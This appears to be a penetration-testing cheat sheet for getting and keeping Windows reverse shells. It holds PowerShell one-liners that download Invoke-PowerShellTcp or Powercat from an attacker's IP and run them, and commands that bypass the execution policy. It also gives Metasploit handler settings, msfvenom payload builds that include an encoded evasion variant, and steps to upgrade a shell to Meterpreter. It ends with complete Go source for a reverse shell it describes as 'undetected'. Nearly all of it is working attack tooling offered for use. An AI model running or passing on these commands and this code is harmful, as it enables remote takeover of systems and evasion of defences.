Skip to main content

Stabilization

:: In Windows we can use rlwrap before Connecting to the Target Machine
rlwrap nc -nvlp <PORT>

CMD - PSH

Invoke-PowerShellTcp   Powercat



# [Invoke-PowerShellTcp] Download - Execute 
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');" "Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

# [Powercat] Download - Execute 
powershell IEX "(New-Object Net.WebClient).DownloadString('http://IP:PORT/Powercat.ps1');" "Powercat -c IP -p PORT -e cmd"
:: [Invoke-PowerShellTcp] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Invoke-PowerShellTcp.ps1;Invoke-PowerShellTcp -Reverse -IPAddress IP -Port PORT"

:: [Powercat] Import - Execute
powershell -command "Set-ExecutionPolicy Bypass -Scope process -Force;. .\Powercat.ps1;Powercat -c IP -p PORT -e cmd"

Interface

:: Enable Unicode Characters
chcp 65001

:: Set Keyboard Layout
Set-WinUserLanguageList -LanguageList us-US -force

Metasploit

:: Catching a Reverse Shell
:: Load the Module
use exploit/multi/handler

:: Parameters
set LHOST
set LPORT

:: Set the Correct PAYLOAD
set PAYLOAD windows/shell/reverse_tcp

PAYLOADS

:: Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP
msfvenom -p windows/x64/shell/reverse_tcp LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

:: Reverse TCP Encoded
msfvenom -p windows/shell/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f FORMAT -o OUTPUT

Upgrading To Meterpreter

It May Be Necessary To Run The Commands Multiple Times Before Succeeding
:: Background the SHELL: [CTRL+Z]
:: Provide the Session Number
sessions -u SESSION
:: Background the SHELL: [CTRL+Z]
:: Load the Module
use multi/manage/shell_to_meterpreter

:: Provide the Session Number
:: [Method 1]
run session=SESSION 

:: [Method 2]
run session=SESSION win_transfer=POWERSHELL

:: [Method 3]
run session=SESSION win_transfer=VBS

GO Reverse Shell

Features Missing

Mostly Stable and Undetected. Works on Windows - Linux.


:: Build
:: This is going to Generate a Binary Named [GoRevShell.exe]
env GOOS=windows GOARCH=386 go build GoRevShell.go

:: Usage
GoRevShell.exe -i <IP> -p <PORT>

:: Catching The Shell
rlwrap nc -nvlp <PORT>
SOURCE

package main

import (
	"bufio"
	"flag"
	"fmt"
	"net"
	"os"
	"os/exec"
	"runtime"
)

func execute(msg string) (string, []string) {
	var exe string
	os := runtime.GOOS

	if os == "windows" {
		exe = "cmd"
	} else if os == "linux" {
		exe = "/bin/bash"
	} else {
		fmt.Println("Unknown Arch. Terminating.")
	}

	args := []string{}
	if exe == "cmd" {
		args = append(args, "/C")
	} else {
		args = append(args, "-c")
	}

	args = append(args, msg)
	return exe, args
}

func main() {
	args := os.Args
	if len(args) < 2 {
		fmt.Println("Usage: [OPTIONS]\n\n GO Reverse Shell\n\nOptions:\n -i HOST -p PORT")
		return
	}

	I_P := flag.String("i", "", "HOST")
	L_PORT := flag.String("p", "", "PORT")
	flag.Parse()

	conn, _ := net.Dial("tcp", fmt.Sprintf("%s:%s", *I_P, *L_PORT))
	for {
		cwd, _ := os.Getwd()
		fmt.Fprintf(conn, "\n%s> ", cwd)
		msg, _ := bufio.NewReader(conn).ReadString('\n')
		exe, args := execute(msg)
		out, err := exec.Command(exe, args...).Output()
		if err != nil {
			fmt.Println(conn, "\n\n%s\n", err)
		}
		fmt.Fprintf(conn, "%s", out)
	}
}